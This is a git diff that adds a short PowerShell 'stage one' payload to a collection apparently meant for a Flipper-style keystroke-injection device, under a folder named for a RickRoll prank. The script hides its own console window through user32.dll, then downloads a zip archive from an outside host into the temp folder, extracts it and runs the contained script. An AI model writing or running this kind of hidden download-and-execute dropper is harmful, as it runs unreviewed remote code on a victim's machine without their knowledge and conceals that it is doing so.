diff --git a/Payloads/Flip-ADV-RickRoll/StageOne.txt b/Payloads/Flip-ADV-RickRoll/StageOne.txt new file mode 100644 index 0000000..8a83307 --- /dev/null +++ b/Payloads/Flip-ADV-RickRoll/StageOne.txt @@ -0,0 +1,5 @@ +$i = '[DllImport("user32.dll")] public static extern bool ShowWindow(int handle, int state);'; +add-type -name win -member $i -namespace native; +[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0); + +cd "$env:tmp";irm -Uri 'https://jakoby.lol/qee' -O "rr.zip";Expand-Archive "rr.zip" -Force; .\rr.ps1